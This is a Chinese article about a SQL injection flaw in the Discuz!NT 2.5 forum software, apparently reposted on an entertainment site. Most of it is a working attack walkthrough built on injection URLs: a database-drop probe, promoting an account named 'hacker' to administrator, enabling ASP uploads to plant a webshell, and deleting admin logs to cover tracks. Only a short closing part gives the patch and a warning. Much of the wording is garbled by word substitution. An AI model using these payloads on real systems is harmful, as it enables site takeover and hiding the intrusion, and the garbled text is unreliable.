Discuz!NT 2.5最新注入缝隙测验剖析(图)tengxun - 牛牛娱乐

Discuz!NT 2.5最新注入缝隙测验剖析(图)tengxun

2019-02-12 08:41:41 | 作者: 安寒 | 标签: 缝隙,测验,格局 | 浏览: 8691

Discuz!NT是一款功用强壮的依据ASP.net渠道的BBS体系,占有不少的市场份额,特别是一些大中型专业社区都选用该体系。最近,ISTO成员在其最新的2.5版别中发现了一个安全缝隙,成功使用此缝隙可以直接批改管理员的暗码进入后台,取得管理员权限,然后操控整个网站。下面笔者布置环境解析该缝隙,以期引起咱们的注重。
  环境描绘
  操作体系:Windows 2003
  Discuz!NT版别:2.5
  URL:https://www.gslw.com
  数据库:SQL Server 2005
  1、缝隙原因
  缝隙是由showuser.aspx文件引起的,该文件的作用是显现论坛的会员列表。由于脚本中关于用来用户排序的ordertype参数未经过滤而直接查询数据库,攻击者可以经过精心结构的ordertype参数进行数据库的写操作。(图1)

  2、缝隙测验
  判别Discuz!NT是否存在该缝隙,咱们可以结构ordertype参数进程测验。下面代码的意思是删去gslw数据库,由于不存在gslw数据库因此会报错“无法对数据库'glsw'履行删去,由于它不存在,或许您没有所需的权限。”这就阐明履行了数据库操作,咱们可以依据过错信息判别是否存在该缝隙。咱们结构的URl为
  https://www.gslw.com/showuser.aspx?ordertype=desc;drop database glsw;
  显现的过错页面见图1,阐明存在该缝隙。(图2)

3、用户提权
  翻开论坛注册一个用户为hacker的会员见图3,然后咱们可以进行结构一段URL经过showuser.aspx的ordertype参数将hacker提高为管理员。结构的URL为“https://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='hacker';”其作用就是将注册用户hacker的adminid和guoupid设置为1,也就是将其提高为管理员。将该URL输入浏览器地址栏回车后可以看到hacker被提高为管理员见图4。(图3)(图4)


  hacker被提高为管理员后就可以登录体系后台进行各种操作了。Discuz!NT的后台功用的确比较强壮,(图5)

  4、更改上传格局
  该缝隙除了可以提高管理员为,还可以更改默许的附件上传格局。默许情况下,Discuz!NT只支撑jpg,gif,png,zip,rar,jpeg格局的附件上传,使用该缝隙可以将其间的某种格局替换为asp、aspx等可履行脚本的格局,然后取得一个Webshell。咱们可以结构URL更改其上传文件格局,比方咱们将jgp格局更改为aspx格局,就可以结构这样的URL“https://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='asp' where extension='jpg';” ,终究的履行作用见图6。(图6)

5、取得Webshell
  经过上面的操作咱们就可以在恣意一论坛版块下发表新主题 ,然后经过附件上传功用将以asp木马上传到服务器。上传完成后,在“我的附件”项下可以找到上传的asp木马,点击该asp网马就直接运转,登录后取得一个webshell。(图7)

  6、铲除痕迹
  取得webshell后,就可以经过该缝隙结构URL铲除痕迹,康复Discuz!NT的默许状况。首要包含一下几项:
  https://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='asp'; 改回jpg格局
  https://www.gslw.com/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='hacker'; 铲除日志
  https://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='hacker'; hacker降权限
  7、总结及防备
  从上面的演示可以看到该缝隙对选用Discuz!NT的BBS要挟极大,攻击者不只可以进入后台,并且可以获取webshell,进而浸透操控服务器。笔者上面演示用的是asp木马,假如用aspx木马其权限将更大,拿下服务器将会更简单。
  针对此缝隙Discuz!NT官方供给了补丁,该补丁的地址为:
  https://download.comsenz.com/DiscuzNT/patch/dnt_25_n2_patch20080829.zip
  批改办法是将压缩包中的Discuz.Web.dll文件上传到bin目录,覆盖掉曾经的文件。尽管Discuz!NT比较迅速地发布了补丁,可是笔者在此时进行了安全测验,有相当多的选用Discuz!NT 2.5体系的BBS论坛仍旧没有打该补丁。期望经过此文,可以引起咱们对该缝隙的注重,赶快修正缝隙。
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表牛牛娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章